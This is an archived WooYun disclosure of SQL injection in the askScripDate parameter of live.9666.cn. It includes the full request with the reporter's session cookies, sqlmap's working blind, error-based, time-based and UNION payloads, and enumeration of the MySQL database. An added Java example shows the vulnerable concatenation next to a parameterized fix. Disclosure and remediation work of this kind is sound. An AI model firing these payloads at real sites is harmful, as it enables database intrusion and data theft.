Vulnerability summary

Defect ID: wooyun-2015-0143438

Title: SQL injection on a 牛仔网 subsite (UNION query possible)

Vendor: 牛仔网

Author: missy

Submitted: 2015-09-25 17:40

Fixed: 2015-11-09 19:50

Published: 2015-11-09 19:50

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-09-25: Details reported to the vendor, awaiting vendor handling
2015-09-25: Vendor confirmed the issue; details disclosed to the vendor only
2015-10-05: Details disclosed to core white hats and domain experts
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public

Brief description:

Detailed description:

GET /scrip/findMyScrips.action?roomsInfo=&askScripDate=2015-07-20'' HTTP/1.1
Host: live.9666.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://live.9666.cn/scrip/myScrips?toolbar
Cookie: cowboy_website=c226bc22-af26-4e88-a886-80d132782618; musicStatus=on; __utma=236883550.934637685.1443167390.1443167390.1443167390.1; __utmb=236883550.11.10.1443167390; __utmc=236883550; __utmz=236883550.1443167390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; cowboy_temp=""; cowboy_login=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_user_name=asdfg; cowboy_login_imply=C3A25A22C3B450C3812A36C38EC3A6C2BDC29BC39E4C7A69C2896A1E; cowboy_nick_name=61736466675f34354c4f4e43; cowboy_latest_login_time=1443168569; haoshengyin=1; JSESSIONID=D80ECF2572888245CD6E573022B67F0D
Connection: keep-alive


Injectable parameter: askScripDate


[Screenshots 1.jpg, 2.jpg, 3.jpg not reproduced]


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: askScripDate (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: roomsInfo=&askScripDate=-5945' OR 6307=6307#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: roomsInfo=&askScripDate=-4368' OR 1 GROUP BY CONCAT(0x7162787a71,(SELECT (CASE WHEN (1877=1877) THEN 1 ELSE 0 END)),0x71626a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: roomsInfo=&askScripDate=2015-07-20''' OR SLEEP(5)#
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: roomsInfo=&askScripDate=2015-07-20''' UNION ALL SELECT CONCAT(0x7162787a71,0x6e4c4e70697444767670,0x71626a7171)#
---
web application technology: JSP
back-end DBMS: MySQL 5.0.12
Database: live
[86 tables]

Proof of vulnerability:

Fix recommendation:

Filter the parameter
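The report's fix is parameter filtering. As an added example (not the reporter's or the site's code), the snippet below shows a hypothetical JDBC handler for the askScripDate parameter in the concatenated form that sqlmap's payloads exploit, next to a hardened form that validates the value as a calendar date and binds it with PreparedStatement; the class, table and column names are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.time.LocalDate;
import java.time.format.DateTimeParseException;

// Added example, not the site's code: hypothetical DAO behind
// /scrip/findMyScrips.action. Table and column names are assumptions.
public class ScripDao {

    // Vulnerable form: the request parameter is pasted into the SQL text, so a
    // value such as 2015-07-20'' UNION ALL SELECT ... (the report's payload)
    // changes the query structure instead of being treated as data.
    public static ResultSet findVulnerable(Connection conn, String askScripDate)
            throws SQLException {
        String sql = "SELECT id, content FROM t_liv_scrip_ask"
                + " WHERE ask_date = '" + askScripDate + "'";
        Statement st = conn.createStatement();
        return st.executeQuery(sql);
    }

    // Hardened form: the value is validated against the only shape the handler
    // accepts, then bound as a parameter so the driver never parses it as SQL.
    public static ResultSet findSafe(Connection conn, String askScripDate)
            throws SQLException {
        LocalDate date = parseDateOrNull(askScripDate);
        if (date == null) {
            throw new IllegalArgumentException("askScripDate must be yyyy-MM-dd");
        }
        String sql = "SELECT id, content FROM t_liv_scrip_ask WHERE ask_date = ?";
        PreparedStatement ps = conn.prepareStatement(sql);
        ps.setDate(1, java.sql.Date.valueOf(date));
        return ps.executeQuery();
    }

    // Allow-list check: strict ISO-8601 date only. Anything carrying quotes,
    // comment markers or SQL keywords fails to parse and is rejected up front.
    static LocalDate parseDateOrNull(String raw) {
        if (raw == null) return null;
        try {
            return LocalDate.parse(raw.trim()); // yyyy-MM-dd
        } catch (DateTimeParseException e) {
            return null;
        }
    }
}
```

Binding alone already closes the injection; the date check additionally lets the application log and reject malformed input such as the `2015-07-20''` probe before it reaches the database.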

Copyright notice: please credit the source when reposting: missy@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-09-25 19:48

Vendor reply:

Thanks for the submission

Latest status:

None yet